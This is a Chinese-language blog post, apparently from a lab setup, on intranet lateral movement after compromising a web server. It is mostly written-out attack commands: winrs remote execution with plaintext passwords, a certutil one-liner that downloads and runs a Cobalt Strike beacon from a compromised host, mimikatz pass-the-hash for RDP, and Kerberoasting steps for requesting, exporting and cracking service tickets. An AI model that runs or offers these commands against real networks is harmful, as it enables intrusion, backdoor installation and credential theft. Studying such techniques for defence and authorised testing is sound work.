<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="F4tty" />
  <meta name="description" content="" />
  
  
  <title>
    
      内网横向移动(四)-SPN&amp;WinRM&amp;WinRS&amp;RDP 
      
      
      |
    
     F4tty
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/img/favicon.ico">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.2.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/img/avatar.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">F4tty</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">主页</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">归档</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">分类</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">标签</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">友链</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">关于我</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">内网横向移动(四)-SPN&WinRM&WinRS&RDP</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2022-10-04 00:00:00
        </span>
        
              <span class="post-categories">
                <i class="iconfont icon-bookmark" title="分类"></i>
                
                <span class="span--category">
                  <a href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" title="内网安全">
                    <b>#</b> 内网安全
                  </a>
                </span>
                
              </span>
          
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/%E5%86%85%E7%BD%91/" title="内网">
                    #内网
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="内网横向移动-四-SPN-amp-WinRM-amp-WinRS-amp-RDP"><a href="#内网横向移动-四-SPN-amp-WinRM-amp-WinRS-amp-RDP" class="headerlink" title="内网横向移动(四)-SPN&amp;WinRM&amp;WinRS&amp;RDP"></a>内网横向移动(四)-SPN&amp;WinRM&amp;WinRS&amp;RDP</h1><h2 id="环境介绍"><a href="#环境介绍" class="headerlink" title="环境介绍"></a>环境介绍</h2><p><img src="/posts/5d21afd3/1664842686241-01c42a95-96c4-463f-b7eb-955a1db85cb5.png" alt="image.png"><br>已拿到webserver权限并且提权,进行信息搜集<br><img src="/posts/5d21afd3/1664843782716-fbcd5243-8654-481a-ab20-9eadd0bc0b15.png" alt="image.png"></p>
<h2 id="WinRM-amp-WinRS-明文-amp-NTLM"><a href="#WinRM-amp-WinRS-明文-amp-NTLM" class="headerlink" title="WinRM&amp;WinRS-明文&amp;NTLM"></a>WinRM&amp;WinRS-明文&amp;NTLM</h2><p>WinRM代表Windows远程管理，是一种允许管理员远程执行系统管理任务的服务。<br>默认情况下支持Kerberos和NTLM身份验证以及基本身份验证。<br><strong>移动条件：双方都启用的Winrm rs的服务！</strong><br>使用此服务需要管理员级别凭据。<br>Windows 2008 以上版本默认自动状态，Windows Vista&#x2F;win7上必须手动启动；<br>Windows 2012之后的版本默认允许远程任意主机来管理。<br>攻击机开启：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">winrm quickconfig -q</span><br><span class="line">winrm set winrm/config/Client @&#123;TrustedHosts=&quot;*&quot;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/posts/5d21afd3/1664846514743-d8935823-2c11-49e7-bc6a-e870c15333ff.png" alt="image.png"><br>1.探针可用：<br>cs 内置端口扫描5985</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell Get-WmiObject -Class win32_service | Where-Object &#123;$_.name -like &quot;WinRM&quot;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="/posts/5d21afd3/1664846262790-059379e9-3620-4822-a662-9f8e301604b8-1664853102178-9.png" alt="image.png"><br><img src="/posts/5d21afd3/1664846402961-6ad54459-e52e-4989-b59b-f0e22fa295cf.png" alt="image.png"><br>扫描到开放主机<br>2.连接执行：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami</span><br><span class="line">winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami</span><br></pre></td></tr></table></figure>
<p><img src="/posts/5d21afd3/1664846601187-a56aa9e9-8c01-43e0-8b2d-aa4c2a08156a.png" alt="image.png"><br>需要在本机shell环境下执行后续上线方法还是老样子:到webserver下载后门然后执行<br>3.上线CS&amp;MSF:</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 &quot;cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe beacon.exe &amp; beacon.exe&quot;</span><br></pre></td></tr></table></figure>
<p>4.CS内置移动<br><img src="/posts/5d21afd3/1664847544296-e05376b8-f538-4cf0-a179-c526734b9e09.png" alt="image.png"></p>
<h2 id="RDP-明文-amp-NTLM"><a href="#RDP-明文-amp-NTLM" class="headerlink" title="RDP-明文&amp;NTLM"></a>RDP-明文&amp;NTLM</h2><p>远程桌面服务 支持明文及HASH连接<br><strong>条件</strong>：对方开启RDP服务 远程桌面<br>RDP连接：<br>1、直接在当前被控主机上进行远程连接<br>2、建立节点进行连接<br>3、端口的转发（当前2222去访问目标的3389）访问被控2222<br>由于其他主机并不出网,还是要利用建立节点或者建立通道进行连接<br>这里采用socks建立节点代理(具体操作见前篇)<br>1.探针服务：<br>cs 内置端口扫描3389</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">tasklist /svc | find &quot;TermService&quot; # 找到对应服务进程的PID</span><br><span class="line">netstat -ano | find &quot;PID值&quot; # 找到进程对应的端口号</span><br></pre></td></tr></table></figure>
<p><img src="/posts/5d21afd3/1664845984438-0adae4f2-28d8-48a6-9ad3-b2317ce42cbd.png" alt="image.png"><br>2.探针连接：<br>CrackMapExec&amp;MSF 批扫用户名密码验证(具体操作见前篇)<br>3.连接执行：<br>明文连接：利用刚才验证的密码</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mstsc /console /v:192.168.3.32 /admin</span><br></pre></td></tr></table></figure>
<p><img src="/posts/5d21afd3/1664845841402-473ffea3-30e9-4696-b2e6-4aeaef293585.png" alt="image.png"><br><img src="/posts/5d21afd3/1664845572228-6efb0208-31e5-4e82-add6-d7ce52e7e8ab.png" alt="image.png"><br><img src="/posts/5d21afd3/1664845678178-c580af56-d0fe-4d2c-80cb-e9ad25543347.png" alt="image.png"><br>可以看到本地用户和域账户同时存在<br>HASH连接：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mimikatz privilege::debug</span><br><span class="line">mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c &quot;/run:mstsc /restrictedadmin&quot;</span><br></pre></td></tr></table></figure>
<h2 id="Spn-amp-Kerberos-请求-amp-破解-amp-重写"><a href="#Spn-amp-Kerberos-请求-amp-破解-amp-重写" class="headerlink" title="Spn&amp;Kerberos-请求&amp;破解&amp;重写"></a>Spn&amp;Kerberos-请求&amp;破解&amp;重写</h2><p>由于上面的环境不符合需求为了方便不再上线cs直接在本机操作<br>Kerberoasting 攻击的利用：</p>
<ul>
<li>SPN服务发现</li>
<li>请求服务票据</li>
<li>服务票据的导出</li>
<li>服务票据的暴力破解</li>
</ul>
<p>如需利用需要配置策略加密方式(对比)<br>黑客可以使用有效的域用户的身份验证票证（TGT）去请求运行在服务器上的一个或多个目标服务的服务票证。<br>DC在活动目录中查找SPN，并使用与SPN关联的服务帐户加密票证，以便服务能够验证用户是否可以访问。<br>请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5(注意这里的RC4只有加密类型为RC4才可以进行破解利用而AES256加密无法利用)，这意味着服务帐户的NTLM密码哈希用于加密服务票证。<br>黑客将收到的TGS票据离线进行破解，即可得到目标服务帐号的HASH，这个称之为Kerberoast攻击。<br>如果我们有一个为域用户帐户注册的任意SPN，那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。<br>Kerberos攻击条件：<br>采用rc4加密类型票据，工具Rubeus检测或看票据加密类型<br>1.扫描：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">powershell setspn -T 0day.org -q */*</span><br><span class="line">powershell setspn -T 0day.org -q */* | findstr &quot;MSSQL&quot;</span><br></pre></td></tr></table></figure>
<p><img src="/posts/5d21afd3/1664847870046-9e535d93-5917-47c6-a7bc-62f24a54b695.png" alt="image.png"><br>可以探针每台主机充当的角色以及开启的服务<br>2.检测<br><a target="_blank" rel="noopener" href="https://github.com/GhostPack/Rubeus">https://github.com/GhostPack/Rubeus</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./Rubeus.exe kerberoast</span><br></pre></td></tr></table></figure>
<p><img src="/posts/5d21afd3/1664850580606-26233931-90e7-4217-aa39-31017ac5d0d4.png" alt="image.png"><br>如果遇到下图这种，则无法继续利用·<br><img src="/posts/5d21afd3/1664852450833-c55516ac-aaa6-428c-8666-dbe4d51f0f8d.png" alt="image.png"><br>3.请求：(人工判断)<br><a target="_blank" rel="noopener" href="https://github.com/nidem/kerberoast">https://github.com/nidem/kerberoast</a></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">powershell Add-Type -AssemblyName System.IdentityModel</span><br><span class="line">powershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList &quot;MSSQLSvc/Srv-DB-0day.0day.org:1433&quot;</span><br></pre></td></tr></table></figure>
<p>使用mimikatz判断</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz kerberos::ask /target:MSSQLSvc/SqlServer.god.org:1433</span><br></pre></td></tr></table></figure>
<p><img src="/posts/5d21afd3/1664851060997-6100a603-0f10-4432-b2ed-1686b625b32c.png" alt="image.png"><br>可以看到RC4加密<br>4.导出：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz kerberos::list /export</span><br></pre></td></tr></table></figure>
<p><img src="/posts/5d21afd3/1664851269838-bbbcfe57-800a-4e71-8109-e1e93c3bdd90.png" alt="image.png"><br>5.破解：<br><a target="_blank" rel="noopener" href="https://github.com/nidem/kerberoast">https://github.com/nidem/kerberoast</a></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">pass.txt为密码字典 根据前期信息搜集填入</span></span><br><span class="line">python tgsrepcrack.py pass.txt &quot;1-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi&quot;</span><br></pre></td></tr></table></figure>
<p><img src="/posts/5d21afd3/1664851811482-a839dccc-2af1-45e3-9594-279ee6e9beb1.png" alt="image.png"><br>利用获取到的密码继续横向移动<br>5.重写：<br><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/system/174967.html">https://www.freebuf.com/articles/system/174967.html</a></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/posts/b0cb9aff/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2022-10-04 00:00:00
            </span>
            
                  <span class="post-categories">
                    <i class="iconfont icon-bookmark" title="分类"></i>
                    
                    <span class="span--category">
                      <a href="/categories/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/" title="内网安全">
                        <b>#</b> 内网安全
                      </a>
                    </span>
                    
                  </span>
              
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/%E5%86%85%E7%BD%91/" title="内网">
                        #内网
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/posts/fbfafbfe/" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8-%E5%9B%9B-SPN-amp-WinRM-amp-WinRS-amp-RDP"><span class="toc-text">内网横向移动(四)-SPN&amp;WinRM&amp;WinRS&amp;RDP</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E4%BB%8B%E7%BB%8D"><span class="toc-text">环境介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WinRM-amp-WinRS-%E6%98%8E%E6%96%87-amp-NTLM"><span class="toc-text">WinRM&amp;WinRS-明文&amp;NTLM</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RDP-%E6%98%8E%E6%96%87-amp-NTLM"><span class="toc-text">RDP-明文&amp;NTLM</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Spn-amp-Kerberos-%E8%AF%B7%E6%B1%82-amp-%E7%A0%B4%E8%A7%A3-amp-%E9%87%8D%E5%86%99"><span class="toc-text">Spn&amp;Kerberos-请求&amp;破解&amp;重写</span></a></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2022 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + %E5%86%85%E7%BD%91%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8(%E5%9B%9B)-SPN%26WinRM%26WinRS%26RDP + '&url=' + http%3A%2F%2Fexample.com%2Fposts%2F5d21afd3%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/posts/5d21afd3/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
